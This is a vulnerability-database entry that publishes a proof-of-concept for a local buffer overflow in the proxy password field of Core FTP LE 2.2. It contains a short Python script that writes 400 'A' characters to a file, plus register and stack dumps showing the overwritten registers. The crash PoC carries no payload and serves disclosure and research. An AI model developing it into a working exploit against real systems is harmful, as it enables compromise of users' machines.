Core FTP Le 2.2 Buffer Overflow

2016.07.12
Credit: s0nk3y
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/env python ''' # Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow # Date: 2016-7-11 # Author: s0nk3y # Software Link: ftp://ftp.coreftp.com/coreftplite.exe # Version: 2.2 # Tested on: Windows XP # CVE: N/A # Type: Buffer Overflow [+] Proof of concept Click options (Global Settings) -> Proxy -> enter the password and input "A"*400 -> Ok [+] Registers Detail: EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... ECX 41414145 EDX 0012CE64 EBX 41414145 ESP 0012CB1C EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ESI 41414141 EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... EIP 004A1523 coreftp.004A1523 ''' buffer = "A" * 400 exploit = open("exploit.txt","w") exploit.write(buffer) exploit.close ''' [+] Stack: 0012CCEC 00000003 ... 0012CCF0 00498BFE ??I. RETURN to coreftp.00498BFE from coreftp.004A1520 0012CCF4 0012D124 $?. ASCII "AAAAAAAAAAAAA... 0012CCF8 0012D034 4?. 0012CCFC 41414141 AAAA 0012CD00 00000000 .... 0012CD04 41414141 AAAA 0012CD08 41414141 AAAA 0012CD0C 41414141 AAAA 0012CD10 41414141 AAAA 0012CD14 41414141 AAAA 0012CD18 41414141 AAAA 0012CD1C 41414141 AAAA .... '''


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top